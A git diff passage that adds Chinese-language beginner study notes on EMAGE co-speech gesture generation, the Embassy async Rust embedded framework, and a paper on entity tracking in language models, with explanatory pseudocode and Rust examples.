把原本需要写很多"if-else"优化逻辑的工作,变成了声明式地写"什么等于什么"。编译器不再需要"知道"优化策略——它只需要知道等价关系,最优的优化路径会自动被发现。 + +--- + +*笔记完成。核心问题:你觉得"把所有答案列出来再选最优"这个策略,和编译器通常用的"贪心式一步一步优化"相比,各自的优缺点是什么?思考一下再回答,不用急。* diff --git a/src/content/docs/papers/emage-gesture.md b/src/content/docs/papers/emage-gesture.md new file mode 100644 index 000000000..4140410ce --- /dev/null +++ b/src/content/docs/papers/emage-gesture.md @@ -0,0 +1,263 @@ +--- +title: EMAGE: Towards Unified Holistic Co-Speech Gesture Generation +来源: 'https://arxiv.org/abs/2401.00374' +日期: 2026-06-13 +分类: 机器学习 +子分类: 姿态生成 +provenance: pipeline-v3 +--- + +## 是什么 + +EMAGE 是一套"让 3D 数字人自动跟着说话音频做全身动作"的 AI 框架。 + +日常类比:你看过那种 AI 生成的数字人——说话时嘴巴在动,但手和身体像木头一样。EMAGE 的目标是让这个数字人从脸到脚,全部都能根据声音自动生成协调的动作:表情变化、手势挥舞、肩膀耸动、甚至身体前后晃动。 + +以前做这件事有两种方案: +- 方案 A:只生成脸,不管身体——动作像 NPC 对话 +- 方案 B:只生成手或上半身——忽略脸和下半身 + +EMAGE 的第一件事是把所有身体部位**统一到一个框架里**,同时生成:面部表情 + 上半身 + 手 + 下半身 + 全身位移。这就是标题里"holistic"(整体/统一)的意思。 + +## 为什么重要 + +不理解 EMAGE,下面这些事就没法解释: + +- 为什么现在的数字人看起来"假"——身体和嘴不同步、手势与语义脱节 +- 为什么之前所有模型都是"单点突破"(只做脸或只做手)——缺少统一的数据标准和生成框架 +- 为什么"输入一段语音就能自动生成全身动画"是元宇宙和 AI 虚拟人的关键基础设施 +- VQ-VAE(离散编码)+ Transformer(序列建模)+ 掩码学习(Masked Modeling)三者的组合如何被首次完整应用到这个领域 + +## 核心概念 + +### 1. 四个 VQ-VAE——把身体切成四块分别编码 + +VQ-VAE(Vector Quantized Variational AutoEncoder)是一种"把连续动作压缩成离散码本索引"的技术。EMAGE 的创新在于:它不只用一个 VQ-VAE,而是用**四个**,分别处理: + +| VQ-VAE | 负责身体部位 | 输入维度 | +|--------|-------------|---------| +| Face | 面部表情(FLAME 参数) | T × 106 | +| Upper Body | 上半身(肩、臂、胸) | T × 78 | +| Hands | 双手(每只手 90 维 Rot6D) | T × 180 | +| Lower Body | 下半身(腿 + 脚接触标签) | T × 58 | + +为什么分四个而不是一个?因为不同部位的**与音频的相关性不同**。下半身(走路)和音频关系弱,上半身(手势)和音频关系强。如果塞进一个模型,模型会忽略低频动作(比如偶尔的耸肩)。 + +```python +# 伪代码:四个独立的 VQ-VAE 编码器 +from emage.vq_vae import CompositionalVQVAE + +# 四个码本,各自独立学习 +face_vqvae = CompositionalVQVAE( + input_dim=106, # 面部 FLAME 参数 + codebook_size=512, + embedding_dim=64 +) +upper_vqvae = CompositionalVQVAE(input_dim=78, codebook_size=512, embedding_dim=64) +hand_vqvae = CompositionalVQVAE(input_dim=180, codebook_size=512, embedding_dim=64) +lower_vqvae = CompositionalVQVAE(input_dim=58, codebook_size=512, embedding_dim=64) + +# 编码:把连续动作 → 离散码本索引 +face_codes = face_vqvae.encode_to_codes(face_motion) # [T, 1] +upper_codes = upper_vqvae.encode_to_codes(upper_motion) # [T, 1] +hand_codes = hand_vqvae.encode_to_codes(hand_motion) # [T, 1] +lower_codes = lower_vqvae.encode_to_codes(lower_motion) # [T, 1] +``` + +### 2. 掩码音频手势建模(Masked Audio Gesture Modeling)——"填空"训练法 + +这是 EMAGE 的核心训练策略,灵感来自 NLP 里的 BERT。 + +日常类比:学外语时,老师挖掉一些词让你填空。EMAGE 对动作数据做同样的事——随机遮住身体动作的某些帧,让模型根据音频 + 剩下的动作来"猜"被遮住的部分。 + +训练时有两条路径同时跑: + +``` +路径 1(MG2G):Masked Gesture → Generate Gesture + 输入:部分遮住的动作 + 音频 + 任务:恢复被遮住的动作 + 目的:让模型学会"身体各部位之间的关联" + +路径 2(A2G):Audio → Generate Gesture + 输入:完整动作的前 4 帧(种子)+ 音频 + 任务:生成后续所有动作 + 目的:让模型学会"音频驱动动作" +``` + +```python +# 伪代码:掩码策略——随机遮住动作帧 +import torch + +def mask_gestures(gesture_sequence, mask_ratio=0.3): + """ + gesture_sequence: [T, num_joints * 6] — 连续动作序列 + mask_ratio: 随机遮住的帧比例 + 返回: 掩码后的序列, 掩码位置 + """ + T = gesture_sequence.shape[0] + num_masked = int(T * mask_ratio) + # 随机选 num_masked 帧 + mask_indices = torch.randperm(T)[:num_masked] + masked_seq = gesture_sequence.clone() + masked_seq[mask_indices] = 0 # 用 0 填充被遮住的帧 + return masked_seq, mask_indices + +# 训练时: +masked_gestures, mask_pos = mask_gestures(gt_gesture, mask_ratio=0.3) +# 模型学习从 masked_gestures + audio 恢复 gt_gesture[mask_pos] +``` + +### 3. 内容与节奏自适应注意力(Content & Rhythm Attention) + +音频有两种信息: +- **节奏**(onset + amplitude):重音在哪里、语速快慢——对应身体的节拍性动作(点头、挥手) +- **内容**(语义):说了什么词——对应语义性动作(说到"大"时张开双手) + +EMAGE 用自注意力自适应融合两者,而不是简单相加: + +``` +f(t) = α(t) × 节奏特征 + (1 - α(t)) × 内容特征 + +α(t) = Softmax(MLP(节奏特征, 内容特征)) ← 注意力权重,逐帧计算 +``` + +关键洞察:同一句话里,不同帧可能更需要节奏信息(比如重音"大"字),也可能更需要内容信息(比如描述方向"往左")。自适应融合比硬编码权重更灵活。 + +### 4. BEAT2 数据集——统一标准的 3D 全身动作数据 + +在 EMAGE 之前,动作数据格式五花八门:有的用 Vicon 骨架,有的用 ARKit blendshape,有的用 Pseudo Ground Truth(从视频里估计的,精度差 300 倍)。 + +EMAGE 团队做了三件事: + +1. 用 **MoSh++** 把原始 BVH 骨架转成 SMPL-X 身体模型参数(形状 β、姿态 θ、位移 γ) +2. 加了三条物理规则做后处理:脖子长度 ≈ 身体 1/7、手指不反向弯曲、3σ 截断异常值 +3. 把 **ARKit blendshape** 转成 **FLAME 面部参数**,实现了 mesh 级别的统一 + +最终数据集 60 小时,是目前最大、最标准化的全身共 speech 动作数据集。 + +## 代码示例 + +### 示例 1:完整推理流程——输入音频,输出全身动作 + +```python +from emage import EMAGEPipeline + +# 加载预训练模型 +pipeline = EMAGEPipeline.from_pretrained("pantomatrix/emage") + +# 输入:一段 10 秒的语音 + 前 4 帧种子动作(可选) +audio, sr = torchaudio.load("speech.wav") # [1, T_audio_samples] +seed_gesture = None # None 表示从零开始生成 + +# 生成完整全身动作 +result = pipeline.generate( + audio=audio, + sample_rate=sr, + seed_gesture=seed_gesture, # 也可以传入 [4, joint_dims] 的部分动作 + num_frames=300, # 生成 300 帧(约 10 秒 @ 30fps) + guidance_scale=3.0, # 音频-动作对齐强度 +) + +# result 包含四个部位的离散码本索引 +# face_codes: [300, 1] → VQ-VAE 解码 → 3D 面部表情 +# upper_codes: [300, 1] → 解码 → 上半身姿态 +# hand_codes: [300, 1] → 解码 → 双手姿态 +# lower_codes: [300, 1] → 解码 → 下半身姿态 + 全局位移 +``` + +### 示例 2:掩码补全——给一部分动作,让模型补全剩余部分 + +```python +from emage import EMAGEPipeline + +pipeline = EMAGEPipeline.from_pretrained("pantomatrix/emage") + +# 假设我们有前 10 帧的手势(比如用户在 Blender 里手动做了开头) +manual_start = torch.randn(10, 234) # [10, 55*4+100+4+3] +audio, sr = torchaudio.load("speech.wav") + +# 模型基于前 10 帧 + 音频,补全后续 290 帧 +completed = pipeline.generate( + audio=audio, + sample_rate=sr, + seed_gesture=manual_start, # 用户提供的部分动作 + num_frames=300, +) + +# 这给了动画师一个强大工具:手动关键帧 + AI 补全 = 高效动画制作 +``` + +## 架构总结 + +``` +音频输入 ──┬── 节奏编码器 ──┐ + │ ├── 自适应融合 (CRA) ──→ 音频条件特征 + └── 内容编码器 ──┘ + │ +种子动作 ──→ 掩码 Transformer ──→ 身体线索特征 ──┐ + │ │ + ▼ ▼ + ┌─────────────────┐ ┌─────────────────┐ + │ 面部解码 (VQ) │ │ 身体解码 (VQ) │ + │ [300, 1] → 3D 脸 │ │ [300, 1] → 3D 身 │ + └─────────────────┘ └─────────────────┘ + │ │ + └────────┬───────────┘ + ▼ + 完整全身动画 [300, joint_dims] +``` + +## 踩过的坑 + +1. **前 4 帧种子动作的质量直接影响生成效果**——模型高度依赖种子帧来推断后续动作的空间关系。如果种子帧姿态不自然(比如手穿模),后续生成的动作也会继承这个问题。 + +2. **下半身动作生成质量较低**——论文自己也承认,走路/位移的生成不如上半身和手势。原因是共 speech 数据中下半身动作与音频的关联最弱,模型很难从纯音频推断走路节奏。 + +3. **VQ-VAE 码本大小是超参数**——码本太小(< 128)会导致动作僵化、多样性不足;太大(> 1024)则容易过拟合。论文选的 512 是一个经验值,在不同数据集上可能需要调整。 + +4. **不同数据集混训效果提升但复杂度增加**——EMAGE 能用 Trinity、AMASS 等非同构数据集增强训练,但需要额外的对齐步骤(不同数据集的骨骼/表示格式不同)。 + +## 适用 vs 不适用场景 + +**适用**: +- AI 虚拟人 / 数字人的全身动画生成 +- 游戏 NPC 的对话动画自动化 +- 动画制作辅助:关键帧 + AI 补全 +- 研究"音频-动作"跨模态对齐 + +**不适用**: +- 精确 choreography(编舞)——AI 生成的是"合理的"而非"精确指定的"动作 +- 实时交互场景——当前推理速度还达不到低延迟互动要求 +- 没有语音的纯舞蹈生成——EMAGE 是共 speech 手势,不是通用动作生成 + +## 历史小故事 + +- **2022**:BEAT 数据集发布(原始版本),首次同时收集了 3D 身体骨架和 ARKit 面部数据,但格式不统一 +- **2023-12**:BEAT2(SMPL-X + FLAME 统一格式)+ EMAGE 模型同时发布 +- **2024-03**:论文被 CVPR 2024 接收 +- **核心洞见**:Masked Modeling 在 NLP 和 CV 里已经证明有效,但首次被系统性地引入"音频 → 全身动作"的生成任务 + +## 学到什么 + +1. **统一数据标准是构建领域基础设施的第一步**——EMAGE 团队先用 MoSh++ 和 FLAME 优化把 BEAT 数据"清洗"成统一格式,再训练模型。没有 BEAT2,EMAGE 无从谈起。 + +2. **分而治之 + 后期融合 > 端到端统一**——四个独立 VQ-VAE 分别编码不同身体部位,比一个模型编码全部效果更好。这说明在人体动画这个任务中,身体部位的解耦是有帮助的。 + +3. **掩码学习不是 NLP 专利**——BERT 用掩码学语言,EMAGE 用掩码学"身体语言"。被遮住的部分越多,模型学到的身体关联越鲁棒。 + +4. **从"单点"到"整体"的演化是必然**——从只做脸 → 只做手 → 只做上半身 → 全身统一,EMAGE 是这个演化路径上的重要一站。但"全身"还不是终点,未来可能还包括更精细的脚部动作、服装物理等。 + +## 延伸阅读 + +- 项目页面:[https://pantomatrix.github.io/EMAGE/](https://pantomatrix.github.io/EMAGE/) +- 论文 PDF:[arXiv:2401.00374](https://arxiv.org/abs/2401.00374) +- SMPL-X 人体模型:[SMPL-X paper](https://smpl-x.is.tue.mpg.de/) +- FLAME 面部模型:[FLAME paper](https://flame.is.tue.mpg.de/) +- VQ-VAE 原文:[WaveNet VQ-VAE](https://arxiv.org/abs/1711.00937) +- BERT:[BERT: Pre-training of Deep Bidirectional Transformers](https://arxiv.org/abs/1810.04805) + +## 关联 + +- 共 speech 手势生成的下游任务(虚拟人、游戏 NPC) +- VQ-VAE 在动作生成中的应用 +- Masked Modeling 从 NLP 到 3D 动作的跨模态迁移 diff --git a/src/content/docs/papers/embassy-async-rust-embedded.md b/src/content/docs/papers/embassy-async-rust-embedded.md new file mode 100644 index 000000000..a36797d4d --- /dev/null +++ b/src/content/docs/papers/embassy-async-rust-embedded.md @@ -0,0 +1,326 @@ +--- +title: Embassy — Modern Async Rust for Embedded Systems 零基础学习笔记 +来源: https://embassy.dev/book/ +日期: 2026-06-13 +子分类: 嵌入式与 IoT +分类: 操作系统 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象一家**只有一位服务员、但菜单很满的小餐馆**: + +- **单片机**就是这位服务员——同一时刻只能端一盘菜(单核 CPU)。 +- 店里同时要:闪 LED、等按键、读传感器、通过 UART 发数据。每件事都像一桌客人,不能某桌「等酱油」时全店停业。 +- 传统 **RTOS**(如 FreeRTOS)的做法是雇**多位厨师**:每个任务独占一摞盘子(独立栈),内核在 Tick 中断里**抢灶台**(抢占调度),还要调每人的盘子高度(栈大小)。 +- **Embassy** 换了一种思路:还是**一位服务员**,但学会**协作式多任务**——等酱油时先去给别桌倒水(`.await` 让出执行权),酱油到了再回来继续。所有「等」都写在 Rust 的 `async/await` 里,编译器把每个异步函数变成**状态机**,**不占堆、不 malloc**,栈只有一份。 + +官方 [Embassy Book](https://embassy.dev/book/) 的定位很直白:让 **async/await 成为嵌入式开发的一等公民**。项目由 Embassy 社区维护(GitHub `embassy-rs/embassy`),提供执行器、时间库、以及 nRF / STM32 / RP2040 等 HAL,也可与第三方 HAL 混用。 + +和前面笔记里 FreeRTOS、Zephyr 的对照: + +| 维度 | FreeRTOS / 经典 RTOS | Embassy | +|------|----------------------|---------| +| 任务模型 | 每任务独立栈 + 内核调度 | 协作式 async 任务,编译期状态机 | +| 内存 | 运行时分配栈,需调 `stack_size` | 静态分配,链接期检查 RAM | +| 阻塞写法 | `vTaskDelay`、信号量、队列 | `Timer::after_millis(n).await`、`pin.wait_for_low().await` | +| 省电 | Tickless 等需配置 | 无活可干时执行器让核心睡眠,中断唤醒 | +| 语言 | C | Rust(所有权 + 无数据竞争) | + +Embassy 不是要「消灭 RTOS」,而是说明:在大量 I/O 等待型固件里,**async 协作 + 中断唤醒** 可以比传统内核更省 RAM、更省电,代码也更像顺序逻辑。 + +## 这篇文档在说什么 + +| 维度 | 内容 | +|------|------| +| 项目 | Embassy — 面向嵌入式的 Rust async 框架 | +| 官方书 | [Embassy Book](https://embassy.dev/book/):从 blinky 到 executor、time、HAL | +| 核心 crate | `embassy-executor`、`embassy-time`、`embassy-*` HAL(nrf、stm32、rp 等) | +| 平台 | Cortex-M、RISC-V、ESP32(经 esp-rtos)、WASM、std(本地模拟) | +| 许可 | Apache-2.0 | + +Book 结构大致分三块: + +1. **入门**:用 `embassy-executor::main` 写第一个 async 固件,理解 `Spawner` 与 `#[task]`。 +2. **运行时**:executor 如何 poll 任务、何时 `Poll::Pending`、timer 队列如何驱动 `.await`。 +3. **硬件抽象**:各芯片 HAL 的 GPIO、UART、SPI、USB 等 **async API**,以及低功耗、多核、中断优先级执行器。 + +## 为什么值得学 + +| 场景 | Embassy 提供的价值 | +|------|---------------------| +| 多路 I/O(按键 + LED + 串口 + 传感器) | 每个外设一个 `async fn`,逻辑线性,无需状态机宏 | +| RAM 紧张的 MCU | 无 per-task 栈,链接器在编译期发现 RAM 不够 | +| 电池供电 | 无事可做时 WFI/WFE 睡眠,非忙等轮询 | +| 已有 Rust 嵌入式经验 | 与 `embedded-hal`、`defmt` 生态一致 | +| 对比学习 RTOS | 理解「协作式 vs 抢占式」的设计权衡 | + +若你来自 **Arduino `loop()` + `millis()`** 或 **FreeRTOS 任务**,Embassy 的迁移心智是:把「标志位 + 非阻塞状态机」改写成 `async fn`,把 `delay` 改成 `.await`。 + +## 核心概念一:Future、Executor 与 Task + +Rust 的 `async fn` 不会立刻执行函数体,而是返回一个 **Future**——一种「将来可能完成」的计算。Executor(执行器)负责反复 **poll** 这些 Future: + +``` + 创建任务 ──► poll 任务 + │ + ├─► 有进展 ──► 继续 poll 同一任务 + │ + └─► 遇到 .await 且未就绪 ──► 返回 Poll::Pending + │ + ▼ + 任务入队尾,poll 下一个任务 + │ + ▼ + 全部 Pending ──► 平台睡眠(WFI/WFE) + │ + 中断/定时器到 ──► 唤醒,继续 poll +``` + +要点(来自 [Embassy Book — executor](https://embassy.dev/book/)): + +- **协作式**:同一 executor 上的任务不会在中途被强制打断;只有 `await` 点才让出。 +- **静态任务数**:`#[embassy_executor::task]` 在编译期分配任务元数据;可用 `pool_size` 允许多实例。 +- **`#[embassy_executor::main]`**:宏展开为创建 `Executor`、spawn `main` 为第一个任务、进入 `run` 循环。 +- **`Spawner`**:在 `main` 里 `spawner.spawn(blink(...))` 启动后台任务;`main` 自己也是 async 任务。 + +其他语言里的 **coroutine / goroutine**,在 Rust 嵌入式里就是这套 **async + 专用 executor**。 + +### 与 RTOS 线程的对比 + +``` + RTOS 任务 A RTOS 任务 B + [栈 512B] [栈 1024B] + \ / + \ 内核抢占 / + ▼ ▼ + CPU + + Embassy 任务 A、B、C + [共享一个栈,状态机在 .rodata/.bss] + │ + ▼ + executor 轮询 +``` + +代价是:**长时间不占 await 的 CPU 密集循环** 会饿死其他任务——需要主动 `yield` 或拆成小块。嵌入式固件多数是等外设,这通常可接受。 + +## 核心概念二:embassy-time 与异步等待 + +阻塞延时在 Embassy 里不是 `hal::delay::DelayMs::delay_ms()` 占死 CPU,而是: + +```rust +use embassy_time::Timer; + +Timer::after_millis(500).await; +``` + +`embassy-time` 依赖平台 **Time Driver**(nRF、STM32、RP2040 等 HAL 自带)。内部维护 **timer 队列**:任务在 `await` 时注册唤醒时间,到期由中断标记 Future 就绪,executor 再次 poll。 + +官方建议:**亚微秒级** 精确延时仍用**阻塞**硬件延时——上下文切换成本太高,async 定时器不适合做纳秒级忙等。 + +常见 API: + +| API | 用途 | +|-----|------| +| `Timer::after_millis(n).await` | 相对延时 | +| `Timer::at(instant).await` | 绝对时间点 | +| `Ticker::every(interval)` | 周期定时(类似 RTOS 软件定时器) | + +GPIO 的「等按键按下」同样做成 Future,例如 `Input::wait_for_low().await`,底层在 EXTI 中断里唤醒任务,等待期间 CPU 可睡眠。 + +## 核心概念三:HAL、可组合性与实时性 + +Embassy 不只是 executor: + +- **HAL**(`embassy-nrf`、`embassy-stm32`、`embassy-rp`…):安全封装寄存器,提供 async 与 blocking 两套 API。 +- **Pick and choose**(官网强调):可用 Embassy executor + 别家 HAL;或 Embassy HAL + 别的 runtime;时间驱动也可自实现。 +- **多 executor**:`InterruptExecutor` 可在**中断上下文**驱动高优先级任务,与主线程 executor 形成软实时层次(类似「高优先级 ISR 里跑小 executor」)。 +- **调度扩展**:feature `scheduler-priority`、`scheduler-deadline`(EDF)可选,用额外元数据排序就绪队列。 + +低功耗路径:当 run queue 空且没有即将到期的 timer,平台 `sleep()`;外设中断到来时 **pender** 唤醒 executor 继续 poll——没有「空转 while 轮询标志位」。 + +## 代码示例一:LED 闪烁 + 按键(最小 async 固件) + +下列模式与 [embassy.dev](https://embassy.dev/) 官网示例一致,展示 `main`、`task`、`Spawner`、GPIO async: + +```rust +use embassy_executor::Spawner; +use embassy_nrf::gpio::{AnyPin, Input, Level, Output, OutputDrive, Pull}; +use embassy_nrf::Peri; +use embassy_time::Timer; + +#[embassy_executor::task] +async fn blink(pin: Peri<'static, AnyPin>) { + let mut led = Output::new(pin, Level::Low, OutputDrive::Standard); + loop { + led.set_high(); + Timer::after_millis(150).await; + led.set_low(); + Timer::after_millis(150).await; + } +} + +#[embassy_executor::main] +async fn main(spawner: Spawner) { + let p = embassy_nrf::init(Default::default()); + + // 后台闪灯,与 main 逻辑并发(协作式) + spawner.spawn(blink(p.P0_13.into())).unwrap(); + + let mut button = Input::new(p.P0_11, Pull::Up); + loop { + button.wait_for_low().await; // 按下:异步等 GPIO,不阻塞其他任务 + defmt::info!("Button pressed!"); + button.wait_for_high().await; + defmt::info!("Button released!"); + } +} +``` + +读这段代码的「零基础 checklist」: + +1. `#[embassy_executor::main]` 替代 `fn main()`,整个固件入口是 async 的。 +2. `blink` 是独立 **Task**,由宏生成静态存储;`spawner.spawn` 只接受一次(除非 `pool_size > 1`)。 +3. `Peri<'static, AnyPin>` 表达引脚在整个程序生命周期有效——Rust 所有权防止悬空引脚。 +4. 两个 `loop` 里的 `.await` 是**唯一**让出 CPU 的点;闪灯与按键等待交替被 executor 推进。 + +`Cargo.toml` 片段(Cortex-M 常见配置,版本号以 Book 为准): + +```toml +[dependencies] +embassy-executor = { version = "0.10", features = [ + "arch-cortex-m", + "executor-thread", + "defmt", +] } +embassy-time = { version = "0.5", features = ["defmt"] } +embassy-nrf = { version = "0.8", features = ["nrf52840", "time-driver-rtc1", "defmt"] } +defmt = "1" +defmt-rtt = "1" +panic-probe = { version = "1", features = ["print-defmt"] } +``` + +## 代码示例二:UART 行协议与超时(组合多个 async 原语) + +第二个例子展示 **UART async 读** 与 **超时** 组合——典型传感器/调试口场景。API 因芯片而异,此处以 `embassy-stm32` 风格示意(与 Book 中 async UART 章节思路一致): + +```rust +use embassy_executor::Spawner; +use embassy_stm32::usart::{Uart, Config}; +use embassy_stm32::bind_interrupts; +use embassy_stm32::peripherals::USART1; +use embassy_time::{Duration, Timer, with_timeout}; +use {defmt_rtt as _, panic_probe as _}; + +bind_interrupts!(struct Irqs { + USART1 => embassy_stm32::usart::InterruptHandler; +}); + +#[embassy_executor::task] +async fn uart_line_reader(mut uart: Uart<'static, async>) { + let mut buf = [0u8; 64]; + loop { + // 带超时的 read_until:100ms 内没收到换行则返回 Err + match with_timeout(Duration::from_millis(100), uart.read_until(b'\n', &mut buf)).await { + Ok(Ok(n)) => { + defmt::info!("line bytes: {}", n); + // 解析 buf[..n] ... + } + Ok(Err(e)) => defmt::warn!("uart err: {:?}", e), + Err(_) => { + defmt::trace!("read timeout, retry"); + } + } + Timer::after_millis(10).await; // 简单节流 + } +} + +#[embassy_executor::main] +async fn main(spawner: Spawner) { + let p = embassy_stm32::init(Default::default()); + let cfg = Config::default(); + let uart = Uart::new(p.USART1, p.PA10, p.PA9, Irqs, p.DMA1_CH5, p.DMA1_CH4, cfg).unwrap(); + spawner.spawn(uart_line_reader(uart)).unwrap(); + + loop { + Timer::after_secs(1).await; + defmt::info!("heartbeat"); + } +} +``` + +这段代码体现的 Embassy 模式: + +- **中断 + DMA** 在 HAL 内完成,任务侧只见 `read_until().await`。 +- `with_timeout` 把「无限等待」变成可恢复错误,避免协议卡死占满逻辑。 +- `main` 只负责初始化和心跳,协议循环在子任务——类似 RTOS 里两个线程,但无第二块栈。 + +若平台无 async UART,也可用 `embassy-sync` 的 channel 把 ISR 收到的字节送给 async 任务,模式相同:**ISR 短、任务长**。 + +## 核心概念四:同步原语与跨任务通信 + +除 GPIO、UART 外,Embassy 生态常用: + +| 组件 | 作用 | +|------|------| +| `embassy-sync` | 无堆 `Mutex`、`Channel`、`Signal`、`Watch` 等,供任务间传数据 | +| `embassy-futures` | `select`、`join`、`block_on` 辅助(嵌入式慎用 `block_on` 占死 executor) | +| `critical-section` | 短临界区,与 executor 配合 | + +`Mutex` 在 async 里是 **async mutex**:锁被占用时 `.await` 等待,而不是自旋占 CPU。适合保护共享传感器缓冲区。 + +选择 **channel** 时,生产者 `send().await`、消费者 `receive().await`,天然背压——比裸全局变量 + 标志位更易推理。 + +## 执行器实现细节(进阶阅读) + +Book 中 executor 章节的要点,适合第二次阅读: + +1. **Run queue**:就绪任务 FIFO;也可选优先级 / deadline 调度。 +2. **Waker**:Future 在 `Pending` 时注册 waker;中断里调用 `wake`,任务重新入队。 +3. **多 Executor**:例如主循环 `executor-thread` + 高优先级 `InterruptExecutor` 绑 NVIC 优先级。 +4. **自定义平台**:包装 `raw::Executor`,实现 `poll` 循环 + `pender`(唤醒睡眠线程),可嫁接到现有 RTOS 上。 + +`embassy-executor` crate 文档明确:**必须恰好提供一个 platform 实现**(`platform-cortex-m`、`platform-riscv32` 或 HAL 自带)。 + +## 与 FreeRTOS / Zephyr 选型简表 + +| 需求 | 更倾向 | +|------|--------| +| 团队只熟 C、供应商 BSP 是 FreeRTOS | FreeRTOS / Zephyr | +| 新项目、Rust、I/O 密集、要强内存安全 | Embassy | +| 硬实时 < 10µs 抖动、复杂优先级继承 | 抢占 RTOS 或 InterruptExecutor + 裸 ISR | +| 要完整蓝牙 Mesh / 全网络栈开箱 | Zephyr 往往更全;Embassy 需叠组件 | +| 本地单元测试 async 逻辑 | `executor` + `platform-std` 在 PC 上跑 | + +Embassy 官方立场是:协作式 async **往往更快更小** than 传统 RTOS——前提是工作负载以等待外设为主,而非长时间 CPU 计算。 + +## 学习路径建议 + +1. **环境**:`rustup target add thumbv7em-none-eabihf`(视板子而定),用 `probe-rs` 或 `cargo-embed` 烧录。 +2. **跑通 Book 的 Blinky async 版**:对比同一板子的 blocking 例程,观察 `Cargo.toml` feature 差异。 +3. **改示例**:加一个 `Ticker` 每秒打印,理解 timer 队列。 +4. **读 executor 章**:能画出 `Poll::Pending` → 入队 → 睡眠 → 中断唤醒。 +5. **做一个综合小项目**:按键切换 BLE 广播间隔 + LED 状态机,全部用 async 函数拆分。 + +推荐资源: + +- [Embassy Book](https://embassy.dev/book/) — 主教材 +- [embassy.dev 首页](https://embassy.dev/) — 架构与 pick-and-choose 说明 +- [docs.embassy.dev](https://docs.embassy.dev/) — crate API +- GitHub [embassy-rs/embassy](https://github.com/embassy-rs/embassy) — 示例与 issue + +## 常见坑 + +| 现象 | 可能原因 | +|------|----------| +| 任务从不运行 | 忘记 `spawner.spawn`,或 `main` 里无 `.await` 占满 CPU | +| 链接报 RAM 不足 | 任务状态机过大;减少 `pool_size` 或简化 async 调用链 | +| 定时不准 | 用 async 做极短延时;改用 blocking 或硬件定时器 | +| `spawn` 失败 | 该 `task` 默认 `pool_size = 1`,重复 spawn 同类型任务需加大 pool | +| 死锁 | async `Mutex` 跨任务锁顺序不一致;用 `select!` 或拆分所有权 | + +## 小结 + +Embassy 把嵌入式多任务从「多个栈 + 内核切换」翻译成「**单栈 + async 状态机 + 专用 executor**」。日常写固件时,你把每个外设或协议写成 `async fn`,用 `.await` 表达等待,用 `Spawner` 组装并发;RAM 与唤醒路径在编译期、硬件中断层收口。对于零基础读者,先建立「服务员协作上菜」的心智模型,再跑通 LED + 按键例程,最后读 Book 里 executor 与 time 两章,就能在 Rust 嵌入式里写出可维护的 async 固件,并与 FreeRTOS / Zephyr 路线做出清醒选型。 diff --git a/src/content/docs/papers/entity-tracking-states.md b/src/content/docs/papers/entity-tracking-states.md new file mode 100644 index 000000000..5d1371669 --- /dev/null +++ b/src/content/docs/papers/entity-tracking-states.md @@ -0,0 +1,336 @@ +--- +title: Do Language Models Track Entities Across State Changes? — 零基础学习笔记 +来源: https://arxiv.org/abs/2605.30233 +日期: 2026-06-13 +分类: 机器学习 +子分类: 模型与训练 +provenance: pipeline-v3 +--- + +## 从日常类比开始:仓库管理员 vs 考前突击翻笔记 + +想象你是仓库管理员,有 7 个箱子,每个箱子里放着若干物品。早上交接班时,同事一口气告诉你: + +> 苹果在 0 号箱,桃子在 1 号箱,钟表和罐子在 2 号箱…… + +接着一整天又发生多件事:把手表放进 1 号箱、从 2 号箱拿走罐子、把 0 号箱的苹果移到 1 号箱…… + +下班前老板问:**「1 号箱里现在有什么?」** + +人类通常会怎么做?两种策略: + +1. **增量记账(incremental)**:每听到一条操作,就在脑子里更新一张「全局库存表」——7 个箱子各自装了什么,随时可查。 +2. **延迟汇总(non-incremental)**:平时不维护完整表格;问题出现时,回头把相关句子在脑子里**并行翻一遍**,拼出答案。 + +**Do Language Models Track Entities Across State Changes?**(Tang 等,ICML 2026,arXiv:[2605.30233](https://arxiv.org/abs/2605.30233))用机制可解释性方法证明:主流 Transformer 语言模型更像第二种——它们面对的是一个**本质上是顺序更新状态**的任务,却用**非顺序的「查询时再聚合」**策略来应付。 + +更扎心的是:`REMOVE`(移除)操作背后不是「从某个箱子精确删掉某物」,而是一种脆弱的**全局抑制标签(global suppression tag)**——对象一旦被标成「要删」,模型倾向于在**整个上下文**里都不再预测它。在原始 benchmark 上这常常「碰巧正确」,换几个刁钻场景就会翻车。 + +一句话:**模型会答题,不等于模型在心里维护了一张正确的世界状态表。** + +--- + +## 这篇论文在解决什么问题 + +### 1. 实体追踪(Entity Tracking, ET)是什么 + +**实体追踪**:在叙述 unfolding 的过程中,持续知道「谁在哪里、有什么属性、状态如何变化」。它是下棋、长对话、多步推理、程序执行等能力的底层积木。 + +此前工作大量研究 **entity binding**(静态绑定):「苹果在 1 号箱」→ 问「1 号箱里有____」时模型如何找回「苹果」。Kim & Schuster (2023) 的 **box dataset** 把任务扩展到 **PUT / REMOVE / MOVE** 等**会改变世界状态**的操作,但「真实规模预训练模型在自然语言里**如何实现**这些状态变更」仍不清楚。 + +### 2. 两条研究脉络的空白 + +| 脉络 | 典型工作 | 局限 | +|------|----------|------| +| 玩具模型 + 合成语言 | Merrill et al. 2024; Li et al. 2025 | 层数/token 极限分析,难直接迁移到 Llama/CodeLlama | +| 预训练模型 + binding 机制 | Prakash et al. 2024; Feng & Steinhardt 2023 | 多研究**无状态变更**的「look-back」电路 | + +本文填补:**非玩具 LM + 自然语言 + 多种状态变更 + 行为与机制双向验证**。 + +### 3. 核心问题 + +- 模型是**逐 token / 逐层**累积世界状态,还是**等到 query 出现再一次性聚合**? +- `PUT`、`REMOVE`、`MOVE` 各自在残差流里如何实现? +- 机制分析能否**预测**标准测试里看不到的失败模式,并**干预修复**? + +--- + +## 实验任务长什么样 + +论文沿用 Kim & Schuster (2023) 的 box 格式。一个完整样例: + +```text +The apple is in Box 0, the peach is in Box 1, the clock and the jar is in Box 2, +the television is in Box 3, the brain is in Box 4, the book is in Box 5, +the pin is in Box 6. +Put the watch into Box 1. +Remove the jar from Box 2. +Move the apple in Box 0 to Box 1. +Box 1 contains the +``` + +结构拆成三段: + +| 段落 | 含义 | +|------|------| +| **DESCRIPTION** | 初始世界:7 个箱子、最多每箱 3 个物体(从 100 个物体名池中采样) | +| **OPERATIONS** | 状态变更:`PUT` 放入新物、`REMOVE` 从某箱移除、`MOVE` 等价于移出+移入 | +| **QUERY** | 问指定箱子内容,模型需自回归补全物体列表 | + 